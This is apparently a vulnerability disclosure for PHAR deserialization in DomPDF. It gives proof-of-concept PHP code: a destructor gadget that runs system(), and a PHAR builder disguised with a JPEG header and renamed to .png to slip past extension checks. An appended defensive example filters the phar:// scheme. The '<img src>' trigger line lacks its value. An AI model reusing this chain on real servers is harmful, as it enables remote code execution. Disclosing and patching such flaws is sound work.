DomPDF is vulnerable to PHAR deserialization because it does not check the protocol of a source before passing it to the file_get_contents() function. An attacker who can upload a file of any type to the server can reference it through the phar:// protocol, which unserializes the uploaded file's metadata and
instantiates arbitrary PHP objects. This can lead to remote code execution, especially when DomPDF is used with frameworks that have documented POP chains, such as Laravel, or with vulnerable developer code.
// vuln.php
<?php
// Include autoloader
require_once 'dompdf/autoload.inc.php';
// Include vulnerable objects
include("phar-poc.php");
// Reference the Dompdf namespace
use Dompdf\Dompdf;
use Dompdf\Options;
$options = new Options();
$options->set('isRemoteEnabled', true);
$dompdf = new Dompdf($options);
// Load HTML content
$dompdf->loadHtml('<img src>');
// (Optional) Setup the paper size and orientation
$dompdf->setPaper('A4', 'landscape');
// Render the HTML as PDF
$dompdf->render();
// Output the generated PDF to Browser
//$dompdf->stream();
?>
// phar-poc.php
<?php
// Class whose destructor executes the stored string; included by vuln.php so it is available on unserialize
class AnyClass {
    public $data = null;
    public function __construct($data) {
        $this->data = $data;
    }
    function __destruct() {
        system($this->data);
    }
}
// create_phar.php
<?php
// Same class definition, so the object can be serialized into the archive metadata
class AnyClass {
    public $data = null;
    public function __construct($data) {
        $this->data = $data;
    }
    function __destruct() {
        system($this->data);
    }
}
// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();
Build the PHAR with:
php --define phar.readonly=0 create_phar.php
then execute vuln.php with php vuln.php; you should see whoami being executed.
Note that after generating the PHAR, an attacker can rename it to any extension or filename they want: renaming test.phar to test.png bypasses a file extension check by the developer, and phar://test.png can then be specified in the src attribute.
This vulnerability leads to remote code execution if DomPDF is used with frameworks or developer code that contain usable POP chains.
Remediation: filter out the phar:// protocol before the source is passed to file_get_contents().
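As an added, defender-side example (not DomPDF's own code and not part of the original report), the following PHP shows how an application wrapping DomPDF could enforce that filter; isSafeImageSource, $localRoot and the images directory are assumed names.

```php
<?php
// Added defender-side example, not DomPDF's own code. It shows two ways to
// keep phar:// away from file_get_contents(): dropping the wrapper entirely,
// and allow-listing the schemes an <img src> may use. isSafeImageSource and
// $localRoot are hypothetical names for an application wrapper around DomPDF.

// Option 1: if the application never reads .phar archives, unregister the
// wrapper at bootstrap so no later code path can trigger PHAR deserialisation.
if (in_array('phar', stream_get_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}

// Option 2: validate each source before DomPDF sees the document. An extension
// check alone is useless here: test.phar renamed to test.png still opens via
// phar://test.png, so the decision must be made on the scheme, not the suffix.
function isSafeImageSource(string $src, string $localRoot): bool
{
    // PHP matches wrapper names case-insensitively (PHAR:// works too),
    // so normalise the scheme before comparing.
    $scheme = strtolower((string) parse_url($src, PHP_URL_SCHEME));

    if ($scheme === 'http' || $scheme === 'https') {
        return true;                  // remote fetch, governed by isRemoteEnabled
    }
    if ($scheme === 'data') {
        return stripos($src, 'data:image/') === 0;   // inline image only
    }
    if ($scheme !== '') {
        return false;                 // phar://, file://, ftp://, compress.zlib://, ...
    }

    // No scheme: treat as a local file and require it to resolve inside
    // $localRoot, which also stops ../ traversal out of the image directory.
    $root = realpath($localRoot);
    $real = realpath($localRoot . DIRECTORY_SEPARATOR . $src);
    if ($root === false || $real === false) {
        return false;
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0;
}

// Usage: reject the request before the HTML reaches $dompdf->loadHtml().
$imageRoot = __DIR__ . '/images';     // assumed upload directory
foreach (['phar://test.png', 'PHAR://test.png', 'logo.png'] as $src) {
    printf("%-16s %s\n", $src, isSafeImageSource($src, $imageRoot) ? 'allowed' : 'rejected');
}
```

Both phar:// spellings are rejected on the scheme alone; logo.png is allowed only if it actually exists under the images directory.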